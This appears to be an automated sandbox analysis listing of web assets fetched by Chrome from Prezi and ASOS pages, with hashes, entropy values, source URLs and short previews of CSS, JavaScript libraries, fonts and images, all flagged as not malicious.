                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):46172
                                                                                                                                                                                              Entropy (8bit):4.87099096675411
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:E4FC1CF30958AC618EF79A78B4B7E4E5
                                                                                                                                                                                              SHA1:9C3AD06FBA99607077B02A7FC3432CE3E78A7E00
                                                                                                                                                                                              SHA-256:327643ECA5A0CA6ADF4A00D64000630742F7674861552B827700FB518BA1104D
                                                                                                                                                                                              SHA-512:3E938DDC7E84AB6B709B2CF7E8E0FB2E238896B6722148B2F83808F852E4652BCD501E3C83B377F73A0CC97BE5C415E33F057968422075E51BE4576B9205574F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.prezicdn.net/assets-versioned/prezipage-versioned/5255-770009b/CACHE/css/output.327643eca5a0.css
                                                                                                                                                                                              Preview:#header-raleway .mega-dropdown-menu,#hamburger-overlay .mega-dropdown-menu{top:55px;padding:12px 0;width:100%;max-width:740px;margin-left:-370px;left:50%;border:none;border-top:1px solid #ecedef;box-shadow:0px 2px 8px rgba(5,18,37,0.1);background-color:#FFFFFF;display:flex;justify-content:center;align-items:center}@media (max-width:1200px){#header-raleway .mega-dropdown-menu,#hamburger-overlay .mega-dropdown-menu{max-width:calc(100% + 60px);margin-left:0;left:0}}.mobile-menu-visible #header-raleway .mega-dropdown-menu,.mobile-menu-visible #hamburger-overlay .mega-dropdown-menu{max-width:100%}#header-raleway .mega-dropdown-menu::before,#hamburger-overlay .mega-dropdown-menu::before,#header-raleway .mega-dropdown-menu::after,#hamburger-overlay .mega-dropdown-menu::after{display:none}#header-raleway .mega-dropdown-menu__container,#hamburger-overlay .mega-dropdown-menu__container{display:flex}#header-raleway .mega-dropdown-menu .mega-dropdown-menu-link,#hamburger-overlay .mega-dropdown-men
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (16274), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):16282
                                                                                                                                                                                              Entropy (8bit):5.2957507624658895
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:96DF8CF8AB8167F9E21220507AF487D4
                                                                                                                                                                                              SHA1:C7098117F968F31A00EA2AA7C4A62B29C71F7757
                                                                                                                                                                                              SHA-256:E8F433E3A8F55A150B2CC8EAA19F80CAE7DE7C265FC4933A571D8FF0538A0E42
                                                                                                                                                                                              SHA-512:23B76424B89E884576165E00046D5B92335A19A0DD70E17F20CB100AAE789088970864D53938D5AC5ADDE051B2A49CAA3A006CB294A561130197DD5276CD4057
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://prezi.com/api/v2/prezigram/getProjectContent?projectId=amopqalyrbyv&appVersion=db79dba4b866f04f37ab9c1a9f67c7b028bbb789
                                                                                                                                                                                              Preview:{"content":{"allowFullscreen":true,"allowToShare":true,"assets":{"90fb9a30-33d2-4739-a9a8-e944706a05ec":"/fee0f809839132024f18a54eec5c77bf4f7bf5ca640721e3452aa4ace52796db2ec88b16cb56c5afb8be7a57e293746776e926c3866bb2f2ff5fe3f2961e168d","62e889ac-d604-4e39-8e2f-d641d7296f11":"/000d55a6c43a3297cdd709940151fa9c6494b0a4fb09fb64e6da71ccbde1d8b7d8716c29ff19db94a6e832cb7395b5a1a8efbe4c5522b8535ded539149429133"},"content":{"blockOrder":["ecb6c8f2-75e1-4a0f-aae4-87ebb7d0958b"],"blocks":{"ecb6c8f2-75e1-4a0f-aae4-87ebb7d0958b":{"design":{"header":{"text":""},"hideFooter":false},"entities":["c0a0bd3f-eac3-4c1b-9e86-c4219a2a18d3b216bc01-7d73-4b0f-bc6f-af9b863a2d78","561ec946-cf5a-4626-92fe-6bf19f0915c83ad9e069-59c5-405e-81d3-8de2d15735ca","dfd32214-514d-4899-b1a0-1c8865b3f75edd003b20-4b2a-414d-b60b-b6cdf359f493","5a6b6075-5f69-47fd-894b-f5b38449219e63a8cdca-0bf9-4e3e-bcc9-24002d0833ec"]}},"entities":{"c0a0bd3f-eac3-4c1b-9e86-c4219a2a18d3b216bc01-7d73-4b0f-bc6f-af9b863a2d78":{"type":"IMAGE","top":50
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (1038)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1127
                                                                                                                                                                                              Entropy (8bit):5.348239999385878
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:7F3A6A3D7F495B63DCB141D50B82F200
                                                                                                                                                                                              SHA1:4DDC1B543B837EF71AC8E9E267EE401CD94ECB16
                                                                                                                                                                                              SHA-256:8C14BC742C4B9E6B024585FF5EA867778291163C42D4476206EBD86CC44EAE3E
                                                                                                                                                                                              SHA-512:71F6764EDF5B8BF7E2903B8AFE48B473AB044450E3D65C8690F07882E019AA7AAF1631569290DEE0D5E62E9AABCE0D3AB4B5D4E7CB9C6186F4BC268A3477ED8D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:/*! v8.2.0, license file: uuid.LICENSE.txt */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define("uuid",e):(t=t||self).uuid=e()}(this,(function(){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto),e=new Uint8Array(16);function o(){if(!t)throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return t(e)}for(var n=[],r=0;r<256;++r)n.push((r+256).toString(16).substr(1));return function(t,e,r){var u=(t=t||{}).random||(t.rng||o)();if(u[6]=15&u[6]|64,u[8]=63&u[8]|128,e){r=r||0;for(var d=0;d<16;++d)e[r+d]=u[d];return e}return function(t,e){var o=e||0;return(n[t[o+0]]+n[t[o+1]]+n[t[o+2]]+n[t[o+3]]+"-"+n[t[o+4]]+n[t[o+5]]+"-"+n[t[o+6]]+n[t[o+7]]+"-"+n[t[o+8]]+n[t[o+9]]+"-"+n[t[o
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (17320), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):17320
                                                                                                                                                                                              Entropy (8bit):5.756027257143914
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:2FDF3E79D5E851201A0D52A886453D8B
                                                                                                                                                                                              SHA1:0CCA49213DC761C62B82C185E3A7C597CBE47515
                                                                                                                                                                                              SHA-256:12B5EACCD8A9D81A6A12512566D2B72AA7C100B4A261A08EE6AAE4679A9E36B4
                                                                                                                                                                                              SHA-512:42C03ECEAE90964D9A6DD5999ADC52E5A1899D549B71966881EC43CD3BAAA79A188A8E50212AE720B8C85C094EC06DB09461D7C4E349BD53E526811BC3C0979D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:function _createForOfIteratorHelper(b,t){var e="undefined"!=typeof Symbol&&b[Symbol.iterator]||b["@@iterator"];if(!e){if(Array.isArray(b)||(e=_unsupportedIterableToArray(b))||t&&b&&"number"==typeof b.length){e&&(b=e);var c=0,m=function b(){};return{s:m,n:function t(){return c>=b.length?{done:!0}:{done:!1,value:b[c++]}},e:function b(t){throw t},f:m}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var W=!0,d=!1,n;return{s:function t(){e=e.call(b)},n:function b(){var t=e.next();return W=t.done,t},e:function b(t){d=!0,n=t},f:function b(){try{W||null==e.return||e.return()}finally{if(d)throw n}}}}function _unsupportedIterableToArray(b,t){if(b){if("string"==typeof b)return _arrayLikeToArray(b,t);var e=Object.prototype.toString.call(b).slice(8,-1);return"Object"===e&&b.constructor&&(e=b.constructor.name),"Map"===e||"Set"===e?Array.from(b):"Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamp
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 39504, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):39504
                                                                                                                                                                                              Entropy (8bit):7.9954893142798
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:0DDC93B358BCFBB4734C3294621E38F1
                                                                                                                                                                                              SHA1:33EF6587AE0968E8F02ED8FA8582D8BD35E9CCB6
                                                                                                                                                                                              SHA-256:019A0B8AB8AE844C43502C1C7F1DCF194FABBB0AEC5746D7B9E7465C938C60BA
                                                                                                                                                                                              SHA-512:719C708DD7663491DB15B95FB2698791186725A96F7F1CB4748CBDEE4161A351AD9395822D8EC37863CBC2496302DB6E41764070693177B3D2C9D4FCBBC8AF8A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets1.prezicdn.net/common/fonts/raleway-bold.woff2
                                                                                                                                                                                              Preview:wOF2.......P......!\............................?FFTM..T...6..8.`..V........v..0..6.$..\. ..W..H[......n#....wT..1....(.>1.y..:B.T.c/.....~H........K../..%...._...)e:.&s..53.N....Ft.....92r...t.e....9h.+...Io.F..E....r.r7..JD.N.+=....t......e.....a.b.....I.W.TI.L..q3*GS..l....9....v...y.".}.;\..Y.....8.l"Nbj....\...M...>y.J6vxIXS.h. ..L}...=..y.F3.i...%.....+KL........?...J.,...z..DDD...M%UR%.o........(..R..:.TI.L..x&...g..p..Q1.f&.A.......I.F>?.`[..S_...l..C3......d.P..#Y....Z.....9.g. ..; G..?..B......+T..........c...FmT.1`.L.D@B..u.4....Q.....O....L.Ae..q....xTU......0T.!.[G....J..U.$k.Q5jD..IK...I.Q......../..s....:.!..m....M..n....E...?..{gF.5.${.....I.R`.e...J.F.tV.....g........2..\..F,mJ..#<......R......]...6....wY.j.Q}..m..CUU..Q...Q..""""""".8.8.GDD./.k./..~`Wc_..T...7q#....=..8...b6v.k3.3.....R.........../...e7ev...AN...$.,$.......%.T....Bol7C..i...W.Q...`...x".tB..W5.......i......M..FS...w....7^..b\.:5j.t..}..y.>.../.3._]B.Te..F..>uX.*.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):400
                                                                                                                                                                                              Entropy (8bit):4.705757983822934
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:478D5FBDFB49D87F0498747623BC7B8F
                                                                                                                                                                                              SHA1:1A65D0BAA57A07917F3A7F65FCA6B3A13D12FF75
                                                                                                                                                                                              SHA-256:BAA5D917882C3FDD1E76A0BE5DDB9A02ADDEC5F5BB1A1DDA216DFED9617CF48A
                                                                                                                                                                                              SHA-512:1A51CB61A8793B9347800EE771C185AEAE9F9F0B7B7EFC32A4625B10E9A7F19BAECA89AB2ABF50ACD2B17F6D086C0B471BB0EAA8F8D357ACCB6CCED0BBA2CB1D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://d2pj2twnjx3fya.cloudfront.net/frontend-packages/viewer-container/report_icon.svg
                                                                                                                                                                                              Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M13.8 6.72394C13.2886 6.15421 13.4106 5.55364 12.9333 4.9538C11.2259 2.80775 6 4.9538 6 4.9538V20H8V14C8 14 10.87 12.5825 12.0667 13.8045C12.6018 14.351 12.4408 14.9878 12.9333 15.5746C14.4752 17.4117 19 15.5746 19 15.5746V6.72394C19 6.72394 15.1722 8.25269 13.8 6.72394Z" fill="black"/>.</svg>.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (4922), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4922
                                                                                                                                                                                              Entropy (8bit):5.854092048978981
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:03D93BD608480C18E3A076428C4E3447
                                                                                                                                                                                              SHA1:E799FA1C49C48B8F6A7B31FAE2F41200A343B176
                                                                                                                                                                                              SHA-256:208C431A080509E4DE6860927BD3848B431295F538DB2B1F246677DC01CB57D6
                                                                                                                                                                                              SHA-512:C356CA082A4060DAA366CC44DB55E6B24AF1CD3BAD0DCA5E25035123923305D122D5219778FF5AF7AB8418D680C109CC9F57211022911290B3EAA5700020AABF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                              SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                              SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                              SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:{}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (63485), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):68888
                                                                                                                                                                                              Entropy (8bit):5.118061121216555
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:5D62189E1989C0E2E18684AEE3489CB9
                                                                                                                                                                                              SHA1:803568E4CE93AE9D3D8852C0091BE3CA6DB0873C
                                                                                                                                                                                              SHA-256:6A4CC6A6201D3FCFE2B60AF63FD88BE05C6781CBC369415C0089312A42D243DE
                                                                                                                                                                                              SHA-512:CE4B70140D6D17174620E99527200F248016F91FA95E2C794DF9AFD5E28E328660FF166F80EEB461DFBE5A0118984364D0A13D3B1238B3A96665E58807F8FD35
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/sitechromepublisher/translations.a44197f1305ab213e34e.js
                                                                                                                                                                                              Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[856],{51578:(e,i,a)=>{a.r(i),a.d(i,{default:()=>v});var r=a(60141);const n=JSON.parse('{"accessibility_breadcrumbs":"br.dkrummer","accessibility_label_back":"Tilbage","accessibility_label_loading":"Indl.ser","accessibility_search_clear_text_button_description":"Ryd tekst","accessibility_skip_to_content":"G. til hovedindhold","asos_details":"ASOS-detaljer","burger_open_navigation_label":".bn navigationsmenu","country_selector_button_change_button":"Skift","country_selector_button_heading":"Shopper fra:","country_selector_button_locationtext":"Du er i","delivery_identifier_or":"Eller","dtc_atb_reservation_sellerchangemessage":"Vi har foretaget nogle lageropdateringer, og s.lgeren af din vare er .ndret. Den nye s.lgers priser og leveringstider kan v.re anderledes, s. tag et kig i din indk.bskurv.","errors_something_doesnt_look_right":"Hov! Der er noget galt.","footer_international_sites_label":"Nogle af vo
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 372 x 364, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):104890
                                                                                                                                                                                              Entropy (8bit):7.984954101039208
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:7F4930D80E96CB4690C7228D4EEF36E2
                                                                                                                                                                                              SHA1:82553AA78464CBA069C00A64F0C4AB87FC1F0169
                                                                                                                                                                                              SHA-256:B61F0341E25FD01178717BB68056F1E9459972FEA340B45BD4F7A5276F2EA5BE
                                                                                                                                                                                              SHA-512:FEE0F809839132024F18A54EEC5C77BF4F7BF5CA640721E3452AA4ACE52796DB2EC88B16CB56C5AFB8BE7A57E293746776E926C3866BB2F2FF5FE3F2961E168D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:.PNG........IHDR...t...l.......B.....pHYs...%...%.IR$... .IDATx....de.._.sO....W......5....X9.N..&....... .....$* J.2..N........9...==...@.p.y...U.Uu...{..`..g.Y...wB..C`.Y...g......?...;..................(..(.......:.B..B...m..#i...7......yR.n...PN=G./S*.|"...........d...F[.<..}..b.q.<I.<.t!......#..D2y... ......z.Q..I.f..!.\yR&[D.4.)b.t...Y..{.-..,}...S....../.p....m?.5V\w#z..}./...._....,\.3....8%t!N.-.\w.Nv..M.~...3|!..]...].O...m.../...........n.5......p.S{.}).,..B.......*@#..t.g..O..l.H..4...q.....t;I.+I..e..9..8.....(..%.8..X../........A>...N .L ..m*..........74j..e.w,.yT..+..w.......u..#1....Jf&.sJ..?.......~.....].iM.^S..@.XZ...P...9.zB@...g.Id.82.......0..H........?.F...<..&...G.......r.....;p./..o..w.t.._...}.:.~.*..]...[q.........%.....xGx)N._.S.K0..>..9...$G..:{p....._.w...{...K....m..Wn....D...s.5.}.GXr..Xs./..g....+~u.n.....o...w=.g.~...K ._G.A...<..".A*E./E.3I....i.l....H>MJa..q-..N".'....H...a...$..4.~i....9:....
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):41172
                                                                                                                                                                                              Entropy (8bit):5.505998162296305
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                              SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                              SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                              SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 39356, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):39356
                                                                                                                                                                                              Entropy (8bit):7.995570740652827
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:073BE11022BD7641641D31C320035D3B
                                                                                                                                                                                              SHA1:36C80242F4A9CCA823C1F209D0B6A258548E6EB9
                                                                                                                                                                                              SHA-256:FAFE7C2A01CD06D320949FB650302FDA71EA6A04739C39F4252B3EB1093287F0
                                                                                                                                                                                              SHA-512:CC19B524E5B5FA26CE99465D4CE9C725DD6DBCCB3FB53800588507B187660D904BB899A4102C00B225D21D5958B81DA57CD5E049ADCD70B5AAD08AC2D72EF53D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets1.prezicdn.net/common/fonts/raleway-medium.woff2
                                                                                                                                                                                              Preview:wOF2...................Z........................?FFTM..T...L..*.`..V.....L..4..,..6.$..T. ..u..-[G....CU..".m.@.GR~6....\}...j..je..(.O.t. ^.v.......1Y.m.N...r..#H.Vk.j.V.L..k..I.D.5eV.Xp&aQ. .\D].r.k.0@W.l...m.z6...l+...!a.'HB..M-..`$.......=.0...<..2......27@s?......M...;$'D...,......9....)M*0B..&......I..F.q.q.n.....o..w)..R.*=$!...~_...Jeff..B...l........L......d.3..G..3........z.....Pw....._.Z%._....E...m....T...`.....ntG........R....6Z..i..Q.K..,.Gf...][.&r......d<_........Uu..!@M.....B.6$...o...m#T4..i..... ....2h....$C.E..e-&.9.....].=..E.`n.....J.HH..Qc.Qc....50.F...HK..b...(.[o?.T..l....... @`.....MS.E.4.8g.g....@..H.M{v.R.....sg..`.#..p.....j..wO..{Ks..*).........mi..:...o.z......v.%..T)2.H...ul.d...1...,n.d1g.......@.....sM.?78p..(..i..-.Z=TK.M..X81k4.a6..~..7.J)..B..!{..Em.).............7.o.....}...0....>.T.V.L..;.LU.Um[UU..;TUUUEUmU...."""bY"bY.eYDDD.u.s..h..i..(.._Z3...9p[.+.p...[.d"1...2..2....#.7." ...Fu....o..|...X/.&..N.0.i...?
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:OpenType font data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):64368
                                                                                                                                                                                              Entropy (8bit):6.65545606895014
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:5FAC632B1B61F953C384DBCCCDFDE933
                                                                                                                                                                                              SHA1:ECC62264953A9EB3AFACE5EB28BD0ED83AF944AD
                                                                                                                                                                                              SHA-256:A1321362DC043B61962D04485022CE923D0A1C926C4DBF59EE6EA9CE6E520C4D
                                                                                                                                                                                              SHA-512:3263DE12CA369F5765F00E3E5C929E0A36DB9FB9ED270D24E53C78C2182823E4780AC64D5E96BF1E536DA9416447D672EBDF89EB0BAECE4F543BDC3E988F4A36
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://prezi.com/api/v1/fonts/Raleway-Regular/
                                                                                                                                                                                              Preview:OTTO.......@CFF ..h.......k.GPOS...\..\.../.GSUB.......H...NOS/2..ik...0...`cmaps......X...vhead.y.s.......6hhea.2.........$hmtx.hP.........kern.J.q... ..Avmaxp..P....(....name"L~.........post...2....... .......B...2_.<..........oM......oM..(. .[...........................(.(.[....................P........&.......................2..................P..[........pyrs.@............................. .......n.............................................=...............................................)...........3.D.........3.D...........w.........".....................................Y.........h.s.................................z.............q.......................q.........R...........f...........f...........4.a.........D...........,........... ...........4.%Copyright (c) 2010 - 2012, Matt McInerney (matt@pixelspread.com), Pablo Impallari(impallari@gmail.com), Rodrigo Fuenzalida (hello@rfuenzalida.com) with Reserved Font Name "Raleway"RalewayRegularMattMcInerney,PabloImpallari,RodrigoFuen
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (17577)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):17672
                                                                                                                                                                                              Entropy (8bit):5.210199101660777
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:34F15782047F9D678A947BF675E8A3D8
                                                                                                                                                                                              SHA1:6034D6A3106350EEC176759ECF57C7E8551ADF3F
                                                                                                                                                                                              SHA-256:0C8A9732467A1684679DE0BB5A979468FC31123212AC1F936F7F2CC653E90B29
                                                                                                                                                                                              SHA-512:27DEACE81F42CA5B0EDE5A0EFB534D17B86A51730E6C8776B148CBD5759A5FAE158B6CDE1F04F373B5ED2BC7BCAACF17369BDD302D47F112ADBD5755CC58165B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/shared/require.7c30e08a.js
                                                                                                                                                                                              Preview:/*! v2.2.0, license file: require.LICENSE.txt */.var requirejs,require,define;!function(global){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.2.0",commentRegExp=/(\/\*([\s\S]*?)\*\/|([^:]|^)\/\/(.*)$)/gm,cjsRequireRegExp=/[^.]\s*require\s*\(\s*["']([^'"\s]+)["']\s*\)/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window||"undefined"==typeof navigator||!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function commentReplace(e,t,i,r){return r||""}function isFunction(e){return"[object Function]"===ostring.call(e)}function isArray(e){return"[object Array]"===ostring.cal
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 80284, version 1.590
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):80284
                                                                                                                                                                                              Entropy (8bit):7.996820470704193
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:C928F3743528E38AB3E452F66DACDDA5
                                                                                                                                                                                              SHA1:BCB91E0E5546FFCCAEAA67FCF6BBCFB71EC14CF4
                                                                                                                                                                                              SHA-256:1074381C79236111C60C6FDA4FDF71B2B3780D22AA08500784678A2C958FE14F
                                                                                                                                                                                              SHA-512:FF40B3FA0C009699EFCFB4B07765FA7AB8D3C2BA189BE5444B745F72DCF50A0EDFFD0E242D186E95C90AA4B49E2E701EA66E06B8D1CFDB39395919CE26A5468F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/fonts/futura-pt/bold.11074381.woff2
